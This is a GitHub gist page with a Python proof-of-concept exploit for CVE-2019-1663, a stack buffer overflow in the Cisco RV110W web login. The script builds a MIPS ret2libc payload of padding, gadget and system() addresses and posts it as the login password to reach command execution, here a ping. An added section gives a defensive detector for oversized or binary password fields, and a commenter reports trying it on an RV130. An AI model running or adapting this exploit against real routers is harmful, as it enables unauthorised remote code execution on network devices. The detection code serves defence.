@qkaiser
Last active May 23, 2019 12:35
PoC for CVE-2019-1663 on R110(W)
#!/usr/bin/env python
"""
Exploit for Cisco RV110 stack buffer overflow (CVE-2019-1663).
---------------------------------------------------------------
It simply executes a ret2libc, calling system() with whatever's on the stack
as argument. Offsets are for QEMU target.
First MIPS-based exploit, might delete later.
"""
import requests
import sys
import struct
import string
# libraries and offsets
libc = 0x77aff000
system_offset = 0x00050d70
gadget1_offset = 0x00024098 # addiu $a0, $sp, 0x20; lw $gp, 0x10($sp); lw $ra, 0x18($sp); jr $ra; addiu $sp, $sp, 0x20;
bypass = 0x7ffde010
gp_address = 0x77ba4560
message = "A" * 105 # Padding
message += struct.pack("<L", libc+gadget1_offset) #
message += struct.pack("<L", bypass) * 4
message += struct.pack("<L", gp_address) # this is a valid value for GP, however %60 is a backtick that might get in the way of execution with busybox.
message += "BBBB"
message += struct.pack("<L", libc+system_offset) # ra
message += "ZZZZ"
# cmd must be less than 24 characters so we can keep proper Global Pointer val
cmd = "ping -c3 127.0.0.1 #"
message += "#" * int(len(cmd) % 4)
message += struct.pack("<L", gp_address) * 20
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: %s ip" % (sys.argv[0])
        sys.exit(1)
    params = {
        "submit_button": "login",
        "submit_type": None,
        "gui_action": None,
        "wait_time": 0,
        "change_action": None,
        "enc": 1,
        "user": "cisco",
        "pwd": message,
        "sel_lang": "EN"
    }
    requests.post("https://%s/login.cgi" % sys.argv[1], data=params, verify=False)
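The PoC above delivers its overflow through the `pwd` field of a form POST to `login.cgi`. From a defender's side, the same fact gives a cheap detection: a legitimate login never carries a password field hundreds of bytes long or full of non-printable bytes. The following check is an added example, not code from the gist or from Cisco; it parses request bodies (the two samples are constructed, and the 64-byte threshold is an assumed limit, not a value taken from the device) and flags login POSTs whose `pwd` value is oversized or contains bytes outside printable ASCII.

```python
from urllib.parse import parse_qs

# Constructed sample request bodies for login.cgi (not captured traffic):
# the first is an ordinary login, the second carries an oversized "pwd"
# field with a few URL-encoded non-printable bytes, the shape an overflow
# payload takes once a client URL-encodes it.
SAMPLE_BODIES = [
    "submit_button=login&submit_type=&gui_action=&wait_time=0&enc=1"
    "&user=cisco&pwd=cisco123&sel_lang=EN",
    "submit_button=login&submit_type=&gui_action=&wait_time=0&enc=1"
    "&user=cisco&pwd=" + "A" * 200 + "%7f%e0%10&sel_lang=EN",
]

# Assumed threshold (not from the advisory or the device): real passwords
# for this login form are short; anything beyond this is not a credential.
MAX_PWD_LEN = 64


def suspicious_login_post(body: str, max_pwd_len: int = MAX_PWD_LEN) -> bool:
    """Return True if a login.cgi form body looks like an overflow attempt.

    The body is decoded as latin-1 so that every %XX escape maps to exactly
    one character and raw payload bytes are not mangled by UTF-8 replacement.
    """
    fields = parse_qs(body, keep_blank_values=True, encoding="latin-1")
    for pwd in fields.get("pwd", []):
        # Length check: a stack buffer overflow needs far more than a password.
        if len(pwd) > max_pwd_len:
            return True
        # Content check: return addresses and gadgets decode to control or
        # high bytes, which never appear in a typed password.
        if any(ord(c) < 0x20 or ord(c) > 0x7E for c in pwd):
            return True
    return False


def scan_bodies(bodies):
    """Return the indexes of the bodies that should be alerted on."""
    return [i for i, body in enumerate(bodies) if suspicious_login_post(body)]


if __name__ == "__main__":
    for idx in scan_bodies(SAMPLE_BODIES):
        print("suspicious login.cgi POST in sample %d" % idx)
```

Run on the embedded samples, only the second body is reported. The same two conditions translate directly into a WAF or IDS rule on the `pwd` parameter; the length test alone catches the gist's 105-byte padding plus gadget chain, and the byte-range test catches shorter payloads that still embed addresses.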
wpslxs commented May 23, 2019

Hello.
Exception worked, similar problem in another file (RV130):
requests.exceptions.ConnectionError: ('Connection aborted.', BadStatusLine("''",))

Maybe - params to JSON data?
